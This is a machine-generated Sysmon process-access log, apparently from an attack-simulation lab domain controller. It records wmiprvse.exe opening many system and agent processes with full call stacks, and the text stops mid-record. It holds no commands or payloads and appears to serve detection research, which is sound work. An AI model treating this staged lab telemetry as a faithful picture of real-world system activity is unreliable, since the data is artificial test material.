15:59:16.820{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F600-00000000A301}1548C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023153Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.820{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F300-00000000A301}4180C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023152Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.804{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A27-6008-E400-00000000A301}2860C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023151Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.804{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A22-6008-DB00-00000000A301}4244C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023150Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.804{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A1A-6008-B100-00000000A301}2640C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023149Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.804{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023148Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.804{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A11-6008-9600-00000000A301}4612C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023147Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.804{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8200-00000000A301}4876C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023146Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.804{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8100-00000000A301}4864C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023145Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.804{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7F00-00000000A301}4328C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023144Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.804{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7E00-00000000A301}4316C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023143Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.804{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499C-6008-5500-00000000A301}3796C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023142Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.804{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499B-6008-5100-00000000A301}3588C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023141Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.804{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3600-00000000A301}3468C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023140Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.804{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3400-00000000A301}3124C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023139Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.804{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3300-00000000A301}2260C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023138Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.804{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3200-00000000A301}2612C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023137Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.804{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3100-00000000A301}2704C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023136Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.804{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3000-00000000A301}3068C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023135Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.804{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2E00-00000000A301}3028C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023134Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.804{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2D00-00000000A301}2328C:\Program 